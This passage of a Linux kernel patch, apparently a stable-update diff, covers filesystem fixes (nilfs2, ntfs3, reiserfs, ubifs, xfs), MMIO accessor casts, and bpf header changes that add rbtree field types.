+ 			*ptrp = blocknr;
++		else if (ret == -ENOENT) {
++			/*
++			 * If there was no valid entry in DAT for the block
++			 * address obtained by b_ops->bop_lookup, then pass
++			 * internal code -EINVAL to nilfs_bmap_convert_error
++			 * to treat it as metadata corruption.
++			 */
++			ret = -EINVAL;
++		}
+ 	}
+ 
+  out:
+ 	up_read(&bmap->b_sem);
+-	return ret;
++	return nilfs_bmap_convert_error(bmap, __func__, ret);
+ }
+ 
+ int nilfs_bmap_lookup_contig(struct nilfs_bmap *bmap, __u64 key, __u64 *ptrp,
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 5b15746055927..e26eb45c446f2 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2039,6 +2039,9 @@ static int nilfs_segctor_do_construct(struct nilfs_sc_info *sci, int mode)
+ 	struct the_nilfs *nilfs = sci->sc_super->s_fs_info;
+ 	int err;
+ 
++	if (sb_rdonly(sci->sc_super))
++		return -EROFS;
++
+ 	nilfs_sc_cstage_set(sci, NILFS_ST_INIT);
+ 	sci->sc_cno = nilfs->ns_cno;
+ 
+@@ -2722,7 +2725,7 @@ static void nilfs_segctor_write_out(struct nilfs_sc_info *sci)
+ 
+ 		flush_work(&sci->sc_iput_work);
+ 
+-	} while (ret && retrycount-- > 0);
++	} while (ret && ret != -EROFS && retrycount-- > 0);
+ }
+ 
+ /**
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index c6eb371a36951..bf73964472845 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -2575,7 +2575,7 @@ static int read_next_log_rec(struct ntfs_log *log, struct lcb *lcb, u64 *lsn)
+ 	return find_log_rec(log, *lsn, lcb);
+ }
+ 
+-static inline bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes)
++bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes)
+ {
+ 	__le16 mask;
+ 	u32 min_de, de_off, used, total;
+@@ -4256,6 +4256,10 @@ check_attribute_names:
+ 	rec_len -= t32;
+ 
+ 	attr_names = kmemdup(Add2Ptr(lrh, t32), rec_len, GFP_NOFS);
++	if (!attr_names) {
++		err = -ENOMEM;
++		goto out;
++	}
+ 
+ 	lcb_put(lcb);
+ 	lcb = NULL;
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 51ab759546403..7a1e01a2ed9ae 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -725,9 +725,13 @@ static struct NTFS_DE *hdr_find_e(const struct ntfs_index *indx,
+ 	u32 e_size, e_key_len;
+ 	u32 end = le32_to_cpu(hdr->used);
+ 	u32 off = le32_to_cpu(hdr->de_off);
++	u32 total = le32_to_cpu(hdr->total);
+ 	u16 offs[128];
+ 
+ fill_table:
++	if (end > total)
++		return NULL;
++
+ 	if (off + sizeof(struct NTFS_DE) > end)
+ 		return NULL;
+ 
+@@ -844,6 +848,10 @@ static inline struct NTFS_DE *hdr_delete_de(struct INDEX_HDR *hdr,
+ 	u32 off = PtrOffset(hdr, re);
+ 	int bytes = used - (off + esize);
+ 
++	/* check INDEX_HDR valid before using INDEX_HDR */
++	if (!check_index_header(hdr, le32_to_cpu(hdr->total)))
++		return NULL;
++
+ 	if (off >= used || esize < sizeof(struct NTFS_DE) ||
+ 	    bytes < sizeof(struct NTFS_DE))
+ 		return NULL;
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 20b953871574b..33494a67bf063 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -259,7 +259,6 @@ next_attr:
+ 			goto out;
+ 
+ 		root = Add2Ptr(attr, roff);
+-		is_root = true;
+ 
+ 		if (attr->name_len != ARRAY_SIZE(I30_NAME) ||
+ 		    memcmp(attr_name(attr), I30_NAME, sizeof(I30_NAME)))
+@@ -272,6 +271,7 @@ next_attr:
+ 		if (!is_dir)
+ 			goto next_attr;
+ 
++		is_root = true;
+ 		ni->ni_flags |= NI_FLAG_DIR;
+ 
+ 		err = indx_init(&ni->dir, sbi, attr, INDEX_MUTEX_I30);
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 0e051c5595a21..2050eb3f6a5a6 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -579,6 +579,7 @@ int ni_rename(struct ntfs_inode *dir_ni, struct ntfs_inode *new_dir_ni,
+ bool ni_is_dirty(struct inode *inode);
+ 
+ /* Globals from fslog.c */
++bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes);
+ int log_replay(struct ntfs_inode *ni, bool *initialized);
+ 
+ /* Globals from fsntfs.c */
+diff --git a/fs/pstore/pmsg.c b/fs/pstore/pmsg.c
+index ab82e5f053464..b31c9c72d90b4 100644
+--- a/fs/pstore/pmsg.c
++++ b/fs/pstore/pmsg.c
+@@ -7,10 +7,9 @@
+ #include <linux/device.h>
+ #include <linux/fs.h>
+ #include <linux/uaccess.h>
+-#include <linux/rtmutex.h>
+ #include "internal.h"
+ 
+-static DEFINE_RT_MUTEX(pmsg_lock);
++static DEFINE_MUTEX(pmsg_lock);
+ 
+ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 			  size_t count, loff_t *ppos)
+@@ -29,9 +28,9 @@ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 	if (!access_ok(buf, count))
+ 		return -EFAULT;
+ 
+-	rt_mutex_lock(&pmsg_lock);
++	mutex_lock(&pmsg_lock);
+ 	ret = psinfo->write_user(&record, buf);
+-	rt_mutex_unlock(&pmsg_lock);
++	mutex_unlock(&pmsg_lock);
+ 	return ret ? ret : count;
+ }
+ 
+diff --git a/fs/reiserfs/xattr_security.c b/fs/reiserfs/xattr_security.c
+index 857a65b057264..157ebfe2456bb 100644
+--- a/fs/reiserfs/xattr_security.c
++++ b/fs/reiserfs/xattr_security.c
+@@ -82,11 +82,15 @@ int reiserfs_security_write(struct reiserfs_transaction_handle *th,
+ 			    struct inode *inode,
+ 			    struct reiserfs_security_handle *sec)
+ {
++	char xattr_name[XATTR_NAME_MAX + 1] = XATTR_SECURITY_PREFIX;
+ 	int error;
+-	if (strlen(sec->name) < sizeof(XATTR_SECURITY_PREFIX))
++
++	if (XATTR_SECURITY_PREFIX_LEN + strlen(sec->name) > XATTR_NAME_MAX)
+ 		return -EINVAL;
+ 
+-	error = reiserfs_xattr_set_handle(th, inode, sec->name, sec->value,
++	strlcat(xattr_name, sec->name, sizeof(xattr_name));
++
++	error = reiserfs_xattr_set_handle(th, inode, xattr_name, sec->value,
+ 					  sec->length, XATTR_CREATE);
+ 	if (error == -ENODATA || error == -EOPNOTSUPP)
+ 		error = 0;
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 5e6bcce94e641..66ba57a139d2a 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -358,7 +358,6 @@ static struct inode *create_whiteout(struct inode *dir, struct dentry *dentry)
+ 	umode_t mode = S_IFCHR | WHITEOUT_MODE;
+ 	struct inode *inode;
+ 	struct ubifs_info *c = dir->i_sb->s_fs_info;
+-	struct fscrypt_name nm;
+ 
+ 	/*
+ 	 * Create an inode('nlink = 1') for whiteout without updating journal,
+@@ -369,10 +368,6 @@ static struct inode *create_whiteout(struct inode *dir, struct dentry *dentry)
+ 	dbg_gen("dent '%pd', mode %#hx in dir ino %lu",
+ 		dentry, mode, dir->i_ino);
+ 
+-	err = fscrypt_setup_filename(dir, &dentry->d_name, 0, &nm);
+-	if (err)
+-		return ERR_PTR(err);
+-
+ 	inode = ubifs_new_inode(c, dir, mode, false);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+@@ -395,7 +390,6 @@ out_inode:
+ 	make_bad_inode(inode);
+ 	iput(inode);
+ out_free:
+-	fscrypt_free_filename(&nm);
+ 	ubifs_err(c, "cannot create whiteout file, error %d", err);
+ 	return ERR_PTR(err);
+ }
+@@ -492,6 +486,7 @@ static int ubifs_tmpfile(struct user_namespace *mnt_userns, struct inode *dir,
+ 	unlock_2_inodes(dir, inode);
+ 
+ 	ubifs_release_budget(c, &req);
++	fscrypt_free_filename(&nm);
+ 
+ 	return finish_open_simple(file, 0);
+ 
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 2469f72eeaabb..6b7d95b65f4b6 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -44,6 +44,33 @@ enum {
+ 	NOT_ON_MEDIA = 3,
+ };
+ 
++static void do_insert_old_idx(struct ubifs_info *c,
++			      struct ubifs_old_idx *old_idx)
++{
++	struct ubifs_old_idx *o;
++	struct rb_node **p, *parent = NULL;
++
++	p = &c->old_idx.rb_node;
++	while (*p) {
++		parent = *p;
++		o = rb_entry(parent, struct ubifs_old_idx, rb);
++		if (old_idx->lnum < o->lnum)
++			p = &(*p)->rb_left;
++		else if (old_idx->lnum > o->lnum)
++			p = &(*p)->rb_right;
++		else if (old_idx->offs < o->offs)
++			p = &(*p)->rb_left;
++		else if (old_idx->offs > o->offs)
++			p = &(*p)->rb_right;
++		else {
++			ubifs_err(c, "old idx added twice!");
++			kfree(old_idx);
++		}
++	}
++	rb_link_node(&old_idx->rb, parent, p);
++	rb_insert_color(&old_idx->rb, &c->old_idx);
++}
++
+ /**
+  * insert_old_idx - record an index node obsoleted since the last commit start.
+  * @c: UBIFS file-system description object
+@@ -69,35 +96,15 @@ enum {
+  */
+ static int insert_old_idx(struct ubifs_info *c, int lnum, int offs)
+ {
+-	struct ubifs_old_idx *old_idx, *o;
+-	struct rb_node **p, *parent = NULL;
++	struct ubifs_old_idx *old_idx;
+ 
+ 	old_idx = kmalloc(sizeof(struct ubifs_old_idx), GFP_NOFS);
+ 	if (unlikely(!old_idx))
+ 		return -ENOMEM;
+ 	old_idx->lnum = lnum;
+ 	old_idx->offs = offs;
++	do_insert_old_idx(c, old_idx);
+ 
+-	p = &c->old_idx.rb_node;
+-	while (*p) {
+-		parent = *p;
+-		o = rb_entry(parent, struct ubifs_old_idx, rb);
+-		if (lnum < o->lnum)
+-			p = &(*p)->rb_left;
+-		else if (lnum > o->lnum)
+-			p = &(*p)->rb_right;
+-		else if (offs < o->offs)
+-			p = &(*p)->rb_left;
+-		else if (offs > o->offs)
+-			p = &(*p)->rb_right;
+-		else {
+-			ubifs_err(c, "old idx added twice!");
+-			kfree(old_idx);
+-			return 0;
+-		}
+-	}
+-	rb_link_node(&old_idx->rb, parent, p);
+-	rb_insert_color(&old_idx->rb, &c->old_idx);
+ 	return 0;
+ }
+ 
+@@ -199,23 +206,6 @@ static struct ubifs_znode *copy_znode(struct ubifs_info *c,
+ 	__set_bit(DIRTY_ZNODE, &zn->flags);
+ 	__clear_bit(COW_ZNODE, &zn->flags);
+ 
+-	ubifs_assert(c, !ubifs_zn_obsolete(znode));
+-	__set_bit(OBSOLETE_ZNODE, &znode->flags);
+-
+-	if (znode->level != 0) {
+-		int i;
+-		const int n = zn->child_cnt;
+-
+-		/* The children now have new parent */
+-		for (i = 0; i < n; i++) {
+-			struct ubifs_zbranch *zbr = &zn->zbranch[i];
+-
+-			if (zbr->znode)
+-				zbr->znode->parent = zn;
+-		}
+-	}
+-
+-	atomic_long_inc(&c->dirty_zn_cnt);
+ 	return zn;
+ }
+ 
+@@ -233,6 +223,42 @@ static int add_idx_dirt(struct ubifs_info *c, int lnum, int dirt)
+ 	return ubifs_add_dirt(c, lnum, dirt);
+ }
+ 
++/**
++ * replace_znode - replace old znode with new znode.
++ * @c: UBIFS file-system description object
++ * @new_zn: new znode
++ * @old_zn: old znode
++ * @zbr: the branch of parent znode
++ *
++ * Replace old znode with new znode in TNC.
++ */
++static void replace_znode(struct ubifs_info *c, struct ubifs_znode *new_zn,
++			  struct ubifs_znode *old_zn, struct ubifs_zbranch *zbr)
++{
++	ubifs_assert(c, !ubifs_zn_obsolete(old_zn));
++	__set_bit(OBSOLETE_ZNODE, &old_zn->flags);
++
++	if (old_zn->level != 0) {
++		int i;
++		const int n = new_zn->child_cnt;
++
++		/* The children now have new parent */
++		for (i = 0; i < n; i++) {
++			struct ubifs_zbranch *child = &new_zn->zbranch[i];
++
++			if (child->znode)
++				child->znode->parent = new_zn;
++		}
++	}
++
++	zbr->znode = new_zn;
++	zbr->lnum = 0;
++	zbr->offs = 0;
++	zbr->len = 0;
++
++	atomic_long_inc(&c->dirty_zn_cnt);
++}
++
+ /**
+  * dirty_cow_znode - ensure a znode is not being committed.
+  * @c: UBIFS file-system description object
+@@ -265,28 +291,32 @@ static struct ubifs_znode *dirty_cow_znode(struct ubifs_info *c,
+ 		return zn;
+ 
+ 	if (zbr->len) {
+-		err = insert_old_idx(c, zbr->lnum, zbr->offs);
+-		if (unlikely(err))
+-			/*
+-			 * Obsolete znodes will be freed by tnc_destroy_cnext()
+-			 * or free_obsolete_znodes(), copied up znodes should
+-			 * be added back to tnc and freed by
+-			 * ubifs_destroy_tnc_subtree().
+-			 */
++		struct ubifs_old_idx *old_idx;
++
++		old_idx = kmalloc(sizeof(struct ubifs_old_idx), GFP_NOFS);
++		if (unlikely(!old_idx)) {
++			err = -ENOMEM;
+ 			goto out;
++		}
++		old_idx->lnum = zbr->lnum;
++		old_idx->offs = zbr->offs;
++
+ 		err = add_idx_dirt(c, zbr->lnum, zbr->len);
+-	} else
+-		err = 0;
++		if (err) {
++			kfree(old_idx);
++			goto out;
++		}
+ 
+-out:
+-	zbr->znode = zn;
+-	zbr->lnum = 0;
+-	zbr->offs = 0;
+-	zbr->len = 0;
++		do_insert_old_idx(c, old_idx);
++	}
++
++	replace_znode(c, zn, znode, zbr);
+ 
+-	if (unlikely(err))
+-		return ERR_PTR(err);
+ 	return zn;
++
++out:
++	kfree(zn);
++	return ERR_PTR(err);
+ }
+ 
+ /**
+diff --git a/fs/xfs/libxfs/xfs_sb.c b/fs/xfs/libxfs/xfs_sb.c
+index 1eeecf2eb2a77..28c464307817d 100644
+--- a/fs/xfs/libxfs/xfs_sb.c
++++ b/fs/xfs/libxfs/xfs_sb.c
+@@ -72,7 +72,8 @@ xfs_sb_validate_v5_features(
+ }
+ 
+ /*
+- * We support all XFS versions newer than a v4 superblock with V2 directories.
++ * We current support XFS v5 formats with known features and v4 superblocks with
++ * at least V2 directories.
+  */
+ bool
+ xfs_sb_good_version(
+@@ -86,16 +87,16 @@ xfs_sb_good_version(
+ 	if (xfs_sb_is_v5(sbp))
+ 		return xfs_sb_validate_v5_features(sbp);
+ 
++	/* versions prior to v4 are not supported */
++	if (XFS_SB_VERSION_NUM(sbp) != XFS_SB_VERSION_4)
++		return false;
++
+ 	/* We must not have any unknown v4 feature bits set */
+ 	if ((sbp->sb_versionnum & ~XFS_SB_VERSION_OKBITS) ||
+ 	    ((sbp->sb_versionnum & XFS_SB_VERSION_MOREBITSBIT) &&
+ 	     (sbp->sb_features2 & ~XFS_SB_VERSION2_OKBITS)))
+ 		return false;
+ 
+-	/* versions prior to v4 are not supported */
+-	if (XFS_SB_VERSION_NUM(sbp) < XFS_SB_VERSION_4)
+-		return false;
+-
+ 	/* V4 filesystems need v2 directories and unwritten extents */
+ 	if (!(sbp->sb_versionnum & XFS_SB_VERSION_DIRV2BIT))
+ 		return false;
+diff --git a/include/asm-generic/io.h b/include/asm-generic/io.h
+index 4c44a29b5e8ef..587e7e9b9a375 100644
+--- a/include/asm-generic/io.h
++++ b/include/asm-generic/io.h
+@@ -236,7 +236,7 @@ static inline u64 readq(const volatile void __iomem *addr)
+ 
+ 	log_read_mmio(64, addr, _THIS_IP_, _RET_IP_);
+ 	__io_br();
+-	val = __le64_to_cpu(__raw_readq(addr));
++	val = __le64_to_cpu((__le64 __force)__raw_readq(addr));
+ 	__io_ar(val);
+ 	log_post_read_mmio(val, 64, addr, _THIS_IP_, _RET_IP_);
+ 	return val;
+@@ -287,7 +287,7 @@ static inline void writeq(u64 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 64, addr, _THIS_IP_, _RET_IP_);
+ 	__io_bw();
+-	__raw_writeq(__cpu_to_le64(value), addr);
++	__raw_writeq((u64 __force)__cpu_to_le64(value), addr);
+ 	__io_aw();
+ 	log_post_write_mmio(value, 64, addr, _THIS_IP_, _RET_IP_);
+ }
+@@ -319,7 +319,7 @@ static inline u16 readw_relaxed(const volatile void __iomem *addr)
+ 	u16 val;
+ 
+ 	log_read_mmio(16, addr, _THIS_IP_, _RET_IP_);
+-	val = __le16_to_cpu(__raw_readw(addr));
++	val = __le16_to_cpu((__le16 __force)__raw_readw(addr));
+ 	log_post_read_mmio(val, 16, addr, _THIS_IP_, _RET_IP_);
+ 	return val;
+ }
+@@ -332,7 +332,7 @@ static inline u32 readl_relaxed(const volatile void __iomem *addr)
+ 	u32 val;
+ 
+ 	log_read_mmio(32, addr, _THIS_IP_, _RET_IP_);
+-	val = __le32_to_cpu(__raw_readl(addr));
++	val = __le32_to_cpu((__le32 __force)__raw_readl(addr));
+ 	log_post_read_mmio(val, 32, addr, _THIS_IP_, _RET_IP_);
+ 	return val;
+ }
+@@ -345,7 +345,7 @@ static inline u64 readq_relaxed(const volatile void __iomem *addr)
+ 	u64 val;
+ 
+ 	log_read_mmio(64, addr, _THIS_IP_, _RET_IP_);
+-	val = __le64_to_cpu(__raw_readq(addr));
++	val = __le64_to_cpu((__le64 __force)__raw_readq(addr));
+ 	log_post_read_mmio(val, 64, addr, _THIS_IP_, _RET_IP_);
+ 	return val;
+ }
+@@ -366,7 +366,7 @@ static inline void writeb_relaxed(u8 value, volatile void __iomem *addr)
+ static inline void writew_relaxed(u16 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 16, addr, _THIS_IP_, _RET_IP_);
+-	__raw_writew(cpu_to_le16(value), addr);
++	__raw_writew((u16 __force)cpu_to_le16(value), addr);
+ 	log_post_write_mmio(value, 16, addr, _THIS_IP_, _RET_IP_);
+ }
+ #endif
+@@ -376,7 +376,7 @@ static inline void writew_relaxed(u16 value, volatile void __iomem *addr)
+ static inline void writel_relaxed(u32 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 32, addr, _THIS_IP_, _RET_IP_);
+-	__raw_writel(__cpu_to_le32(value), addr);
++	__raw_writel((u32 __force)__cpu_to_le32(value), addr);
+ 	log_post_write_mmio(value, 32, addr, _THIS_IP_, _RET_IP_);
+ }
+ #endif
+@@ -386,7 +386,7 @@ static inline void writel_relaxed(u32 value, volatile void __iomem *addr)
+ static inline void writeq_relaxed(u64 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 64, addr, _THIS_IP_, _RET_IP_);
+-	__raw_writeq(__cpu_to_le64(value), addr);
++	__raw_writeq((u64 __force)__cpu_to_le64(value), addr);
+ 	log_post_write_mmio(value, 64, addr, _THIS_IP_, _RET_IP_);
+ }
+ #endif
+diff --git a/include/drm/drm_file.h b/include/drm/drm_file.h
+index 0d1f853092ab8..ecffe24e2b1b0 100644
+--- a/include/drm/drm_file.h
++++ b/include/drm/drm_file.h
+@@ -408,7 +408,8 @@ static inline bool drm_is_render_client(const struct drm_file *file_priv)
+  * Returns true if this is an open file of the compute acceleration node, i.e.
+  * &drm_file.minor of @file_priv is a accel minor.
+  *
+- * See also the :ref:`section on accel nodes <drm_accel_node>`.
++ * See also :doc:`Introduction to compute accelerators subsystem
++ * </accel/introduction>`.
+  */
+ static inline bool drm_is_accel_client(const struct drm_file *file_priv)
+ {
+diff --git a/include/drm/i915_pciids.h b/include/drm/i915_pciids.h
+index 4a4c190f76984..8f648c32a9657 100644
+--- a/include/drm/i915_pciids.h
++++ b/include/drm/i915_pciids.h
+@@ -706,7 +706,6 @@
+ 	INTEL_VGA_DEVICE(0x5693, info), \
+ 	INTEL_VGA_DEVICE(0x5694, info), \
+ 	INTEL_VGA_DEVICE(0x5695, info), \
+-	INTEL_VGA_DEVICE(0x5698, info), \
+ 	INTEL_VGA_DEVICE(0x56A5, info), \
+ 	INTEL_VGA_DEVICE(0x56A6, info), \
+ 	INTEL_VGA_DEVICE(0x56B0, info), \
+diff --git a/include/linux/blk-crypto.h b/include/linux/blk-crypto.h
+index 1e3e5d0adf120..5e5822c18ee41 100644
+--- a/include/linux/blk-crypto.h
++++ b/include/linux/blk-crypto.h
+@@ -95,8 +95,8 @@ int blk_crypto_init_key(struct blk_crypto_key *blk_key, const u8 *raw_key,
+ int blk_crypto_start_using_key(struct block_device *bdev,
+ 			       const struct blk_crypto_key *key);
+ 
+-int blk_crypto_evict_key(struct block_device *bdev,
+-			 const struct blk_crypto_key *key);
++void blk_crypto_evict_key(struct block_device *bdev,
++			  const struct blk_crypto_key *key);
+ 
+ bool blk_crypto_config_supported_natively(struct block_device *bdev,
+ 					  const struct blk_crypto_config *cfg);
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index cf0d88109e3f9..1c88f6761eea3 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -95,11 +95,11 @@ struct bpf_map_ops {
+ 
+ 	/* funcs callable from userspace and from eBPF programs */
+ 	void *(*map_lookup_elem)(struct bpf_map *map, void *key);
+-	int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
+-	int (*map_delete_elem)(struct bpf_map *map, void *key);
+-	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
+-	int (*map_pop_elem)(struct bpf_map *map, void *value);
+-	int (*map_peek_elem)(struct bpf_map *map, void *value);
++	long (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
++	long (*map_delete_elem)(struct bpf_map *map, void *key);
++	long (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
++	long (*map_pop_elem)(struct bpf_map *map, void *value);
++	long (*map_peek_elem)(struct bpf_map *map, void *value);
+ 	void *(*map_lookup_percpu_elem)(struct bpf_map *map, void *key, u32 cpu);
+ 
+ 	/* funcs called by prog_array and perf_event_array map */
+@@ -138,7 +138,7 @@ struct bpf_map_ops {
+ 	struct bpf_local_storage __rcu ** (*map_owner_storage_ptr)(void *owner);
+ 
+ 	/* Misc helpers.*/
+-	int (*map_redirect)(struct bpf_map *map, u64 key, u64 flags);
++	long (*map_redirect)(struct bpf_map *map, u64 key, u64 flags);
+ 
+ 	/* map_meta_equal must be implemented for maps that can be
+ 	 * used as an inner map.  It is a runtime check to ensure
+@@ -156,7 +156,7 @@ struct bpf_map_ops {
+ 	int (*map_set_for_each_callback_args)(struct bpf_verifier_env *env,
+ 					      struct bpf_func_state *caller,
+ 					      struct bpf_func_state *callee);
+-	int (*map_for_each_callback)(struct bpf_map *map,
++	long (*map_for_each_callback)(struct bpf_map *map,
+ 				     bpf_callback_t callback_fn,
+ 				     void *callback_ctx, u64 flags);
+ 
+@@ -180,6 +180,10 @@ enum btf_field_type {
+ 	BPF_KPTR       = BPF_KPTR_UNREF | BPF_KPTR_REF,
+ 	BPF_LIST_HEAD  = (1 << 4),
+ 	BPF_LIST_NODE  = (1 << 5),
++	BPF_RB_ROOT    = (1 << 6),
++	BPF_RB_NODE    = (1 << 7),
++	BPF_GRAPH_NODE_OR_ROOT = BPF_LIST_NODE | BPF_LIST_HEAD |
++				 BPF_RB_NODE | BPF_RB_ROOT,
+ };
+ 
+ struct btf_field_kptr {
+@@ -189,7 +193,7 @@ struct btf_field_kptr {
+ 	u32 btf_id;
+ };
+ 
+-struct btf_field_list_head {
++struct btf_field_graph_root {
+ 	struct btf *btf;
+ 	u32 value_btf_id;
+ 	u32 node_offset;
+@@ -201,7 +205,7 @@ struct btf_field {
+ 	enum btf_field_type type;
+ 	union {
+ 		struct btf_field_kptr kptr;
+-		struct btf_field_list_head list_head;
++		struct btf_field_graph_root graph_root;
+ 	};
+ };
+ 
+@@ -283,6 +287,10 @@ static inline const char *btf_field_type_name(enum btf_field_type type)
+ 		return "bpf_list_head";
+ 	case BPF_LIST_NODE:
+ 		return "bpf_list_node";
++	case BPF_RB_ROOT:
++		return "bpf_rb_root";
++	case BPF_RB_NODE:
++		return "bpf_rb_node";
+ 	default:
+ 		WARN_ON_ONCE(1);
+ 		return "unknown";
+@@ -303,6 +311,10 @@ static inline u32 btf_field_type_size(enum btf_field_type type)
+ 		return sizeof(struct bpf_list_head);
+ 	case BPF_LIST_NODE:
+ 		return sizeof(struct bpf_list_node);
++	case BPF_RB_ROOT:
++		return sizeof(struct bpf_rb_root);
++	case BPF_RB_NODE:
++		return sizeof(struct bpf_rb_node);
+ 	default:
+ 		WARN_ON_ONCE(1);
+ 		return 0;
+@@ -323,6 +335,10 @@ static inline u32 btf_field_type_align(enum btf_field_type type)
+ 		return __alignof__(struct bpf_list_head);
+ 	case BPF_LIST_NODE:
+ 		return __alignof__(struct bpf_list_node);
++	case BPF_RB_ROOT:
++		return __alignof__(struct bpf_rb_root);
++	case BPF_RB_NODE:
++		return __alignof__(struct bpf_rb_node);
+ 	default:
+ 		WARN_ON_ONCE(1);
+ 		return 0;
+@@ -440,6 +456,9 @@ void copy_map_value_locked(struct bpf_map *map, void *dst, void *src,
+ void bpf_timer_cancel_and_free(void *timer);
+ void bpf_list_head_free(const struct btf_field *field, void *list_head,
+ 			struct bpf_spin_lock *spin_lock);
++void bpf_rb_root_free(const struct btf_field *field, void *rb_root,
++		      struct bpf_spin_lock *spin_lock);
++
+ 
+ int bpf_obj_name_cpy(char *dst, const char *src, unsigned int size);
+ 
+@@ -582,6 +601,11 @@ enum bpf_type_flag {
+ 	/* MEM is tagged with rcu and memory access needs rcu_read_lock protection. */
+ 	MEM_RCU			= BIT(13 + BPF_BASE_TYPE_BITS),
+ 
++	/* Used to tag PTR_TO_BTF_ID | MEM_ALLOC references which are non-owning.
++	 * Currently only valid for linked-list and rbtree nodes.
++	 */
++	NON_OWN_REF		= BIT(14 + BPF_BASE_TYPE_BITS),
++
+ 	__BPF_TYPE_FLAG_MAX,
+ 	__BPF_TYPE_LAST_FLAG	= __BPF_TYPE_FLAG_MAX - 1,
+ };
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 53d175cbaa027..ed2f082eabb37 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -43,6 +43,22 @@ enum bpf_reg_liveness {
+ 	REG_LIVE_DONE = 0x8, /* liveness won't be updating this register anymore */
+ };
+ 
++/* For every reg representing a map value or allocated object pointer,
++ * we consider the tuple of (ptr, id) for them to be unique in verifier
++ * context and conside them to not alias each other for the purposes of
++ * tracking lock state.
++ */
++struct bpf_active_lock {
++	/* This can either be reg->map_ptr or reg->btf. If ptr is NULL,
++	 * there's no active lock held, and other fields have no
++	 * meaning. If non-NULL, it indicates that a lock is held and
++	 * id member has the reg->id of the register which can be >= 0.
++	 */
++	void *ptr;
++	/* This will be reg->id */
++	u32 id;
++};
++
+ struct bpf_reg_state {
+ 	/* Ordering of fields matters.  See states_equal() */
+ 	enum bpf_reg_type type;
+@@ -223,11 +239,6 @@ struct bpf_reference_state {
+ 	 * exiting a callback function.
+ 	 */
+ 	int callback_ref;
+-	/* Mark the reference state to release the registers sharing the same id
+-	 * on bpf_spin_unlock (for nodes that we will lose ownership to but are
+-	 * safe to access inside the critical section).
+-	 */
+-	bool release_on_unlock;
+ };
+ 
+ /* state of the program:
+@@ -328,21 +339,8 @@ struct bpf_verifier_state {
+ 	u32 branches;
+ 	u32 insn_idx;
+ 	u32 curframe;
+-	/* For every reg representing a map value or allocated object pointer,
+-	 * we consider the tuple of (ptr, id) for them to be unique in verifier
+-	 * context and conside them to not alias each other for the purposes of
+-	 * tracking lock state.
+-	 */
+-	struct {
+-		/* This can either be reg->map_ptr or reg->btf. If ptr is NULL,
+-		 * there's no active lock held, and other fields have no
+-		 * meaning. If non-NULL, it indicates that a lock is held and
+-		 * id member has the reg->id of the register which can be >= 0.
+-		 */
+-		void *ptr;
+-		/* This will be reg->id */
+-		u32 id;
+-	} active_lock;
++
++	struct bpf_active_lock active_lock;
+ 	bool speculative;
+ 	bool active_rcu_lock;
+ 
+diff --git a/include/linux/btf.h b/include/linux/btf.h
+index 5f628f323442a..ff62fa63dc197 100644
+--- a/include/linux/btf.h
++++ b/include/linux/btf.h
+@@ -72,6 +72,14 @@
+ #define KF_DESTRUCTIVE  (1 << 6) /* kfunc performs destructive actions */
+ #define KF_RCU          (1 << 7) /* kfunc only takes rcu pointer arguments */
+ 
++/*
++ * Tag marking a kernel function as a kfunc. This is meant to minimize the
++ * amount of copy-paste that kfunc authors have to include for correctness so
++ * as to avoid issues such as the compiler inlining or eliding either a static
++ * kfunc, or a global kfunc in an LTO build.
++ */
++#define __bpf_kfunc __used noinline
++
+ /*
+  * Return the name of the passed struct, if exists, or halt the build if for
+  * example the structure gets renamed. In this way, developers have to revisit
+diff --git a/include/linux/filter.h b/include/linux/filter.h
+index ccc4a4a58c727..b08ba0a643f8c 100644
+--- a/include/linux/filter.h
++++ b/include/linux/filter.h
+@@ -1503,9 +1503,9 @@ static inline bool bpf_sk_lookup_run_v6(struct net *net, int protocol,
+ }
+ #endif /* IS_ENABLED(CONFIG_IPV6) */
+ 
+-static __always_inline int __bpf_xdp_redirect_map(struct bpf_map *map, u64 index,
+-						  u64 flags, const u64 flag_mask,
+-						  void *lookup_elem(struct bpf_map *map, u32 key))
++static __always_inline long __bpf_xdp_redirect_map(struct bpf_map *map, u64 index,
++						   u64 flags, const u64 flag_mask,
++						   void *lookup_elem(struct bpf_map *map, u32 key))
+ {
+ 	struct bpf_redirect_info *ri = this_cpu_ptr(&bpf_redirect_info);
